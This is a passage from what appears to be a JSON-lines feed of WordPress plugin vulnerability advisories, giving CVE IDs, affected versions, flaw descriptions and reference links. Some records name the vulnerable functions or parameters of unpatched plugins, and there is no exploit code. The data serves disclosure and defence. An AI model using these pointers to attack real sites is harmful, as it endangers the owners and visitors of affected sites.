{"CVE_ID":"CVE-2024-10285","slug":"ce21-suite","versionImpact":"2.2.0","description":"The CE21 Suite plugin for WordPress is vulnerable to sensitive information disclosure via the plugin-log.txt in versions up to, and including, 2.2.0. This makes it possible for unauthenticated attackers to log in the user associated with the JWT token.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/618a9ad7-3a13-43e6-84f4-35287f07e1c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/618a9ad7-3a13-43e6-84f4-35287f07e1c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ce21-suite\\\/trunk\\\/single-sign-on-ce21.php?rev=3097700#L237\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ce21-suite\\\/trunk\\\/single-sign-on-ce21.php?rev=3097700#L237\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ce21-suite\\\/trunk\\\/single-sign-on-ce21.php?rev=3097700#L281\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ce21-suite\\\/trunk\\\/single-sign-on-ce21.php?rev=3097700#L281\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13671","slug":"music-sheet-viewer","versionImpact":"4.1","description":"The Music Sheet Viewer plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 4.1 via the read_score_file() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/music-sheet-viewer\\\/trunk\\\/music-sheet-viewer.php#L748\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/music-sheet-viewer\\\/trunk\\\/music-sheet-viewer.php#L748\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/569f1cd4-195b-41d4-85cb-f529a1eb18d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/569f1cd4-195b-41d4-85cb-f529a1eb18d4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13851","slug":"modal-portfolio","versionImpact":"1.7.4.2","description":"The Modal Portfolio plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/modal-portfolio\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/modal-portfolio\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc049cab-6793-4656-9b17-8ca64c566c4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc049cab-6793-4656-9b17-8ca64c566c4c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12563","slug":"s2member-pro","versionImpact":"250214","description":"The s2Member Pro plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 250214 via the 'template' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/s2member.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/s2member.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3326e9d-504f-444f-baf7-03989594f483?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3326e9d-504f-444f-baf7-03989594f483?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6860","slug":"wp-multitasking","versionImpact":"0.1.12","description":"The WP MultiTasking  WordPress plugin through 0.1.12 does not have CSRF check when updating its permalink suffix settings, which could allow attackers to make logged admins perform such action via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d09d3dd-aa49-4ff1-80e7-6d176e378916\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1d09d3dd-aa49-4ff1-80e7-6d176e378916\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7685","slug":"like-share-my-site","versionImpact":"0.2","description":"The Like & Share My Site plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.2. This is due to missing or incorrect nonce validation on the 'lsms_admin' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/like-share-my-site\\\/trunk\\\/lsms.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/like-share-my-site\\\/trunk\\\/lsms.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f126296-0a6e-4d47-8f1a-ce2aa097f21d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f126296-0a6e-4d47-8f1a-ce2aa097f21d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1172","slug":"bookly-responsive-appointment-booking-tool","versionImpact":"21.5","description":"The Bookly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the full name value in versions up to, and including, 21.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3efbd9d-e2b5-4915-a964-29a49c7fba86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3efbd9d-e2b5-4915-a964-29a49c7fba86?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2876981%40bookly-responsive-appointment-booking-tool&new=2876981%40bookly-responsive-appointment-booking-tool&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2876981%40bookly-responsive-appointment-booking-tool&new=2876981%40bookly-responsive-appointment-booking-tool&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2414","slug":"meeting-scheduler-by-vcita","versionImpact":"4.2.10","description":"The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_save_settings_callback function in versions up to, and including, 4.2.10. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to modify the plugins settings, upload media files, and inject malicious JavaScript.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L88\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c99aab5-a995-44ae-bc14-09f73e6b22c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c99aab5-a995-44ae-bc14-09f73e6b22c5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4423","slug":"rays-grid","versionImpact":"1.2.2","description":"The RAYS Grid plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.2. This is due to missing or incorrect nonce validation on the rsgd_insert_update() function. This makes it possible for unauthenticated attackers to update post fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e5911815-db53-46f2-a16d-ed21be20bbfb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e5911815-db53-46f2-a16d-ed21be20bbfb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2572600\\\/rays-grid\\\/trunk\\\/includes\\\/class-db.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2572600\\\/rays-grid\\\/trunk\\\/includes\\\/class-db.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1538","slug":"theme-demo-import","versionImpact":"1.1.1","description":"Theme Demo Import WordPress plugin before 1.1.1 does not validate the imported file, allowing high-privilege users such as admin to upload arbitrary files (such as PHP) even when FILE_MODS and FILE_EDIT are disallowed.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b19adf7c-3983-487b-9b46-0f2922b08c1c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b19adf7c-3983-487b-9b46-0f2922b08c1c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1907","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxDeleteCategory function. This makes it possible for unauthenticated attackers to delete categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08c79118-9dad-44fd-b683-7950276d3808?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08c79118-9dad-44fd-b683-7950276d3808?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0757","slug":"insert-or-embed-articulate-content-into-wordpress","versionImpact":"4.3000000023","description":"The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 is not properly filtering which file extensions are allowed to be imported on the server, allowing the uploading of malicious code within zip files","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eccd017c-e442-46b6-b5e6-aec7bbd5f836\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eccd017c-e442-46b6-b5e6-aec7bbd5f836\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6023","slug":"contentlock","versionImpact":"1.0.3","description":"The ContentLock WordPress plugin through 1.0.3 does not have CSRF check in place when adding emails, which could allow attackers to make a logged in admin perform such action via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e812189-2980-453d-931d-1f785e8dbcc0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e812189-2980-453d-931d-1f785e8dbcc0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6315","slug":"blox-page-builder","versionImpact":"1.0.65","description":"The Blox Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'handleUploadFile' function in all versions up to, and including, 1.0.65. This makes it possible for authenticated attackers, with contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fe551db-2073-4eeb-83da-9ce8c2c031e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fe551db-2073-4eeb-83da-9ce8c2c031e1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blox-page-builder\\\/trunk\\\/inc_php\\\/unitecreator_assets.class.php?rev=1866874#L979\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blox-page-builder\\\/trunk\\\/inc_php\\\/unitecreator_assets.class.php?rev=1866874#L979\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6929","slug":"dynamic-featured-image","versionImpact":"3.7.0","description":"The Dynamic Featured Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018dfiFeatured\u2019 parameter in all versions up to, and including, 3.7.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6700e926-21c1-45c9-bca9-62ef0218e998?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6700e926-21c1-45c9-bca9-62ef0218e998?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dynamic-featured-image\\\/trunk\\\/dynamic-featured-image.php#L434\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dynamic-featured-image\\\/trunk\\\/dynamic-featured-image.php#L434\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dynamic-featured-image\\\/trunk\\\/dynamic-featured-image.php#L469\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dynamic-featured-image\\\/trunk\\\/dynamic-featured-image.php#L469\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dynamic-featured-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dynamic-featured-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9224","slug":"hello-world","versionImpact":"2.1.1","description":"The Hello World plugin for WordPress is vulnerable to Arbitrary File Reading in all versions up to, and including, 2.1.1 via the hello_world_lyric() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f58df1f-66f7-4e3d-af6d-08174653a2ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f58df1f-66f7-4e3d-af6d-08174653a2ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hello-world\\\/tags\\\/2.1.1\\\/hello-world.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hello-world\\\/tags\\\/2.1.1\\\/hello-world.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hello-world\\\/tags\\\/2.1.1\\\/hello-world.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hello-world\\\/tags\\\/2.1.1\\\/hello-world.php#L113\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-49322","slug":"jemployee","versionImpact":"1.0","description":"Incorrect Privilege Assignment vulnerability in CodePassenger Job Board Manager for WordPress allows Privilege Escalation.This issue affects Job Board Manager for WordPress: from n\/a through 1.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/jemployee\\\/wordpress-job-board-manager-for-wordpress-plugin-1-0-privilege-escalation-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/jemployee\\\/wordpress-job-board-manager-for-wordpress-plugin-1-0-privilege-escalation-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10284","slug":"ce21-suite","versionImpact":"2.2.0","description":"The CE21 Suite plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.2.0. This is due to hardcoded encryption key in the 'ce21_authentication_phrase' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45d66743-300e-480d-98b8-99dc30b6e786?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45d66743-300e-480d-98b8-99dc30b6e786?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ce21-suite\\\/trunk\\\/single-sign-on-ce21.php?rev=3097700#L242\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ce21-suite\\\/trunk\\\/single-sign-on-ce21.php?rev=3097700#L242\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10961","slug":"oa-social-login","versionImpact":"5.9.0","description":"The Social Login plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.9.0. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/oa-social-login\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/oa-social-login\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43a64074-ca64-4c34-b467-06d1ad8c5aa0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43a64074-ca64-4c34-b467-06d1ad8c5aa0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12260","slug":"custom-wp-rest-api","versionImpact":"2.2.2","description":"The Ultimate Endpoints With Rest Api plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-wp-rest-api\\\/trunk\\\/admin\\\/api_log_display.php#L146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-wp-rest-api\\\/trunk\\\/admin\\\/api_log_display.php#L146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f36df17d-4633-42e0-b106-908b994d8cb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f36df17d-4633-42e0-b106-908b994d8cb7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13670","slug":"music-sheet-viewer","versionImpact":"4.1","description":"The Music Sheet Viewer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pn_msv' shortcode in all versions up to, and including, 4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/music-sheet-viewer\\\/trunk\\\/music-sheet-viewer.php#L395\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/music-sheet-viewer\\\/trunk\\\/music-sheet-viewer.php#L395\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ec4eb8a-7b03-4392-9137-4f17622bfe54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ec4eb8a-7b03-4392-9137-4f17622bfe54?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0805","slug":"mortgage-loan-calculator","versionImpact":"1.5.20","description":"The Mortgage Calculator \/ Loan Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mlcalc' shortcode in all versions up to, and including, 1.5.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mortgage-loan-calculator\\\/tags\\\/1.5.20\\\/en\\\/forms.inc.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mortgage-loan-calculator\\\/tags\\\/1.5.20\\\/en\\\/forms.inc.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mortgage-loan-calculator\\\/tags\\\/1.5.20\\\/mlcalc.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mortgage-loan-calculator\\\/tags\\\/1.5.20\\\/mlcalc.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a8ca426-34cd-4c98-ae24-f3f31a7fcae5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a8ca426-34cd-4c98-ae24-f3f31a7fcae5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6857","slug":"wp-multitasking","versionImpact":"0.1.12","description":"The WP MultiTasking  WordPress plugin through 0.1.12 does not have CSRF check when updating its Header, Footer and Body Script Settings, which could allow attackers to make logged admins perform such action via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97636602-2dd0-465b-b6dc-acb42147edb3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97636602-2dd0-465b-b6dc-acb42147edb3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4403","slug":"drag-and-drop-multiple-file-upload-for-woocommerce","versionImpact":"1.1.6","description":"The Drag and Drop Multiple File Upload for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads in all versions up to, and including, 1.1.6 due to accepting a user-supplied supported_type string and the uploaded filename without enforcing real extension or MIME checks within the upload() function. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution 